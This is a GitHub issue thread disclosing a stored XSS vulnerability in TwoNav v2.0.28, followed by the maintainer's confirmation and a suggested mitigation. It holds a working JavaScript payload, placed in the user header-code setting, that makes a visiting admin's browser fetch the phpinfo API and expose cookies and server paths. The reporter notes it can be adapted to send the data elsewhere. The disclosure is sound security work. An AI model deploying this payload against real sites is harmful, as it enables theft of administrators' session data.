### ISSUE TITLE
[Warning] Stored XSS in TwoNav v2.0.28-20230624

### ISSUE THREAD

**Issue by Leeyangee** [tznb1/TwoNav#3]
Vulnerability Product:TwoNav v2.0.28-20230624
Vulnerability version: v2.0.28-20230624
Vulnerability type: Stored XSS
Vulnerability Details:
Vulnerability location:add header 、"/index.php?c=api&method=read_data&type=phpinfo&u=admin"

The default settings allowing free register, causes stored XSS
the Stored XSS payload could let admin call phpinfo(); and bypassing the http-only , causes disclosure of cookies、root path of websites、variables of PHP and stuff

firstly , register an account at http://localhost/?c=login, 
account : test
password : test
![image](https://github.com/tznb1/TwoNav/assets/101627018/8213e80d-b4cb-4254-aa48-950b70e179b6)

then go to "站点设置",
because of the http-only, you need to let admin call phpinfo(), the api is this : http://localhost/index.php?c=api&method=read_data&type=phpinfo&u=admin
enter the payload  at the input of "头部(header)代码 - 用户", :

payload:
```javascript
<script src="http://cdn.bootcss.com/jquery/1.11.0/jquery.min.js" type="text/javascript"></script>
<script>
$.ajax({
                url: '/index.php?c=api&method=read_data&type=phpinfo&u=admin',
                type: 'get',
                success: function (data) {
                    console.log(data);
                }
            })
</script>
```
and click "保存"
<img width="505" alt="image" src="https://github.com/tznb1/TwoNav/assets/101627018/ffdf099f-8e27-4c55-accb-7c83b48aaa35">

after it , when an admin enter the page "http://localhost/?u=test", the page will automatically get phpinfo and call console.log() print it
(Certainly you can update the payload to send phpinfo to your server, console log is a test)
![image](https://github.com/tznb1/TwoNav/assets/101627018/2b382a0a-8661-4a74-80ec-96929d8552d9)
finally ,we download phpinfo and open it in html , 
here is large number of cookies was disclosed, and root path of website 
![image](https://github.com/tznb1/TwoNav/assets/101627018/aafdd7be-b5a8-4184-aaa2-107dbadc3074)
![image](https://github.com/tznb1/TwoNav/assets/101627018/42e16f0d-20b6-4936-9ee3-bd63a5773ba7)

proved Stored XSS

discovered by leeya_bug

**Comment by tznb1** [comment]
Thank you for your feedback. We have verified that there is indeed a problem!

At present, the best solution to this problem is for the webmaster to use the user group function to restrict ordinary users from using the custom code function!
At the same time, the next version update of the program will also strengthen this protection!

Thank you again for your feedback! Thank you!
